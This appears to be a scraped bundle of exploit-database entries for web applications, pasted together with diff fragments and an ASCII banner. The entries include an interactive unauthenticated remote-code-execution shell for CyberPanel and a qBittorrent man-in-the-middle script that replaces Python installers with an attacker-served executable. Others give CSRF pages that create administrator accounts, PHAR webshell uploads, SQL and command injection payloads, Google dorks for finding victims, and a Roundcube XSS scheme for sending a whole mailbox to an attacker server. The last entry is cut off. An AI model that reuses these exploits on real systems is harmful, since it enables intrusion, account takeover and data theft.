░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> -d '{"timeConfig":{"timeDate":{\
> "yy":"`sleep 17`",\
> "mm":"`sleep 17`",\
> "dd":"`sleep 17`",\
> "h":"`sleep 17`",\
> "m":"`sleep 17`",\
> "s":"`sleep 17`"},\
> "tz":"`sleep 17`",\
> "tzList":[],\
> "timeServerYN":"`sleep 17`",\
> "timeServer":"1.1.1.1",\
> "timeServerSync":false}}'

View file

@ -0,0 +1,40 @@
# Exploit Title: qBittorrent 5.0.1 MITM RCE
# Date: 01/02/2025
# Exploit Author: Jordan Sharp
# Vendor Homepage: https://github.com/qbittorrent/qBittorrent
# Software Link: https://www.qbittorrent.org/download
# Version: < 5.0.1
# Tested on: Windows 10
# CVE : CVE-2024-51774
Run the PoC on a MITM machine intercepting the host
"""PoC exploit for CVE-2024-51774"""
from mitmproxy import http
targets = [
"https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe",
"https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe",
"https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe",
"https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe",
"https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi",
"https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe",
"https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe",
"https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe",
"https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe",
"https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe",
"https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe",
"https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe",
"https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe",
"https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi",
"https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe"
]
SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe"
def request(flow: http.HTTPFlow) -> None:
"""
Inject any exe instead of a Python installer.
"""
if flow.request.pretty_url in targets:
flow.request.url = SUBSTITUTE_URL

View file

@ -0,0 +1,15 @@
# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
# Software Link: [https://github.com/magnussolution/magnusbilling7]
# Version: [7.3.0]
# Tested on: [Centos]
# CVE : [CVE-2023-30258]
PoC:
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.
[Replace Your Domain Name]

View file

@ -0,0 +1,74 @@
# Exploit Title: CyberPanel v2.3.5, v2.3.6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"
print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()
allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]
parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()
if args.endpoint not in allowed_endpoints:
print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
parser.print_help()
sys.exit(1)
target = args.target
endpoint = args.endpoint
client = httpx.Client(base_url=target, verify=False)
try:
response = client.get("/")
response.raise_for_status()
except httpx.RequestError:
print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
sys.exit(1)
def get_token():
response = client.get("/")
return response.cookies.get("csrftoken")
def rce(client, csrf_token, cmd, endpoint):
headers = {
"X-CSRFToken": csrf_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile": "; %s; #"}' % cmd
response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
return response.json().get("requestStatus")
csrf_token = get_token()
if not csrf_token:
print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
sys.exit(1)
while True:
cmd = input(f"{YELLOW}$> {RESET}")
print(rce(client, csrf_token, cmd, endpoint))

View file

@ -0,0 +1,41 @@
# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
# Date: 2025-04-08
# Exploit Author: Seth Kraft, Alex Tisdale
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: Nagios Log Server 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-200, CWE-284, CWE-522
# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
# Type: Information Disclosure, Improper Access Control
# Exploit Risk: Critical
## Disclosure
For ethical research purposes only. Do not target systems without proper authorization.
## Description
An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.
## PoC
### Step 1: Access the vulnerable endpoint
```
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
```
## Sample Response
```json
[
{
"name": "devadmin",
"username": "devadmin",
"email": "test@example.com",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]
```

View file

@ -0,0 +1,37 @@
# Exploit Tile: CMU CERT/CC VINCE 2.0.6 - Stored XSS
# Vendor: Carnegie Mellon University
# Product web page: https://www.kb.cert.org/vince/
# Affected version: <=2.0.6
Summary: VINCE is the Vulnerability Information and Coordination
Environment developed and used by the CERT Coordination Center
to improve coordinated vulnerability disclosure. VINCE is a
Python-based web platform.
Desc: The framework suffers from an authenticated stored
cross-site scripting vulnerability. Input passed to the
'content' POST parameter is not properly sanitised before
being returned to the user. This can be exploited to execute
arbitrary HTML/JS code in a user's browser session in context
of an affected site.
Tested on: nginx/1.20.0
Django 3.2.17
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5917
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php
13.01.2023
--
$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \
> -H "Cookie: sessionid=xxxx" \
> -d 'content="><marquee>ZSL</marquee>%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx'

View file

@ -0,0 +1,24 @@
# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
# Version: 2.31.0
# Tested on: macOS
# CVE : CVE-2024-53586
GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
Host: www.webfilesys.de
Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=0, i
Te: trailers
Connection: keep-alive

View file

@ -0,0 +1,58 @@
# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901
A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.
The CSRF code:
<html>
<body>
<form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf"> # Set the target
<input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
<input type="hidden" name="id" value="Malicious" /> # Set Username
<input type="hidden" name="password" value="Youarecracked999&#33;" /> # Set Password
<input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" /> # Set Email
<input type="hidden" name="level" value="2" /> # Set privilege 1-Normal user 2-Administrator
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS

View file

@ -0,0 +1,47 @@
# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898
Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account which isn't authorized to manage accounts is able to:
- Enable and disable any account.
- Create new accounts.
- Modify privileges of any account.
- Listing accounts and their information.
After the escalation of the privileges, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS

View file

@ -0,0 +1,30 @@
# Exploit Title: [ flatCore < 1.5 CSRF Vulnerability for Arbitrary .php File Upload via files.upload-script.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
# Software Link: [https://github.com/flatCore/flatCore-CMS]
# Version: [d3a5168]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2019-13961]
PoC:
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="upload_destination" value="../content/files">
<input type="hidden" name="w" value="800">
<input type="hidden" name="h" value="600">
<input type="hidden" name="fz" value="1000">
<input type="hidden" name="unchanged" value="yes">
<input type="file" name="file" value="test.php">
<input type="submit" value="Upload">
</form>
</body>
</html>
[Replace Your Domain Name]

View file

@ -0,0 +1,27 @@
# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/gnuboard/gnuboard5]
# Software Link: [https://github.com/gnuboard/gnuboard5]
# Version: [5.3.2.8]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2020-18662]
PoC:
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
-d "mysql_user=root" \
-d "mysql_pass=password" \
-d "mysql_db=gnuboard_db" \
-d "table_prefix=' OR 1=1--"
result: The application does not work.
[Replace Your Domain Name and Replace Database Information]

View file

@ -0,0 +1,55 @@
# Exploit Title: [GetSimpleCMS < 3.3.16 Remote Code Execution via PHAR File Upload in admin/upload.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/GetSimpleCMS/GetSimpleCMS]
# Software Link: [https://github.com/GetSimpleCMS/GetSimpleCMS]
# Version: [3.3.16]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-28976]
PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
// Initialize a new Phar object, name it "archive.phar"
$phar = new Phar('archive.phar');
// Set the stub (entry point) for the Phar file, pointing to index.php
$phar->startBuffering();
$phar->addFromString('index.php', file_get_contents('index.php'));
$phar->setStub($phar->createDefaultStub('index.php'));
$phar->stopBuffering();
echo "Phar archive created successfully!";
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php.
After running the script, you should find a file named archive.phar in your working directory.
2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php.
2. You can find the file at http://getsimplecms/data/uploads/.
3)Details:
"Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
"Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
"Request URL": "http://getsimplecms/admin/upload.php",
"Request Method": "POST",
"Request Parameters": {
"file": "<Malicious File>"
},
PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 <?php system($_GET['cmd']); ?>
2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).
[Replace Your Domain Name]

View file

@ -0,0 +1,17 @@
# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
# Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
# Version: [7.6]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-44567]
PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest
constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array )
votes['; CREATE TABLE aaa(t text) --]=1

View file

@ -0,0 +1,182 @@
My name: Francisco Moraga (BTshell)
@BTshell
https://www.linkedin.com/in/btshell/
# Exploit Title: LearnPress WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability:
plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay:
http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host:
targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
python
import requests
import time
# Target URL for the API endpoint
url = '
http://targetwebsite.com/wp-json/learnpress/v1/courses
'
# SQL injection payloads
payloads = [
"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection
"IF(1=1, SLEEP(10), 0)", # Basic true condition
"IF(1=2, SLEEP(10), 0)", # Basic false condition
]
# Iterate over payloads and measure response time
for payload in payloads:
params = {'c_only_fields': payload}
start_time = time.time() # Record start time
try:
# Send request to the vulnerable endpoint
response = requests.get(url, params=params)
# Calculate response time
response_time = time.time() - start_time
# Display result
print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
# Check for delay indicative of a successful SQL injection
if response_time > 10:
print("Potential SQL Injection vulnerability detected (delay observed).")
else:
print("No delay observed; injection may be unsuccessful.")
except requests.exceptions.RequestException as e:
print(f"Error during request: {e}")
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: Update the LearnPress plugin to a patched version when available.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.
Este mensaje, incluyendo sus anexos, puede contener información clasificada como
confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo.
Si usted no es el destinatario, le rogamos lo comunique al remitente y
proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no
autorizado está prohibido legalmente.
This message including any attachments may contain confidential information,
within the framework of the corporate Security Management System.
If you are not the intended recipient, please notify the sender and
delete this message without forwarding or retaining a copy, since any
unauthorized use is strictly prohibited by law.
Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home).

View file

@ -0,0 +1,56 @@
# Exploit Title: Roundcube mail server exploit for CVE-2024-37383 (Stored XSS)
# Google Dork:
# Exploit Author: AmirZargham
# Vendor Homepage: Roundcube - Free and Open Source Webmail Software
# Software Link: Releases · roundcube/roundcubemail
# Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6.
# Tested on: firefox,chrome
# CVE: CVE-2024-37383
# CWE: CWE-79
# Platform: MULTIPLE
# Type: WebApps
Description:
The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code on the user's page. To exploit the vulnerability, all attackers need to do is open a malicious email using a Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6.
Usage Info:1 - open the Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export js file.2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).3 - You can put the code in file SVG <animate> tag and send it to the server. (can use this https://github.com/bartfroklage/CVE-2024-37383-POC)4 - After the victim clicks, all emails in the mailbox will be sent to your collaborator server.
This code automates the process of retrieving all messages inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint.Heres a step-by-step breakdown:
-
Setup URLs:
- The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration.
-
Get Total Page Count:
- The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount).
- If pagecount is found, it proceeds to loop through each page.
-
Fetch Message IDs from All Pages:
- For each page from 1 to pagecount, it constructs a paginated URL to request that page.
- Each pages response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list.
-
Retrieve Each Message's Content:
- For each message ID, the code constructs a URL to request detailed data about that message.
- It sends a GET request for each message ID URL, receiving the full response HTML.
-
Extract and Clean Message Data:
- Within each message response, it uses regex to capture the <title> (message title) and main message content.
- Any HTML tags are stripped from the message content to keep only the plain text.
-
Send the Data to the Server:
- For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission.

View file

@ -0,0 +1,61 @@
# Exploit Title: NEWS-BUZZ News Management System - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758
## Vulnerability Description:
There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Vulnerable code section:
In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:
<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>
In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.
## Proof of Concept (PoC):
1.Location: http://localhost/NEWS-BUZZ/index.php
2.Time-Based SQL Injection Payload: ' OR sleep(10)#
3.PoC request:
POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=
4.PoC response:
The response will come called time by using sleep() function.

View file

@ -0,0 +1,16 @@
# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/bg5sbk/MiniCMS]
# Software Link: [https://github.com/bg5sbk/MiniCMS]
# Version: [1.10]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2018-1000638]
PoC:
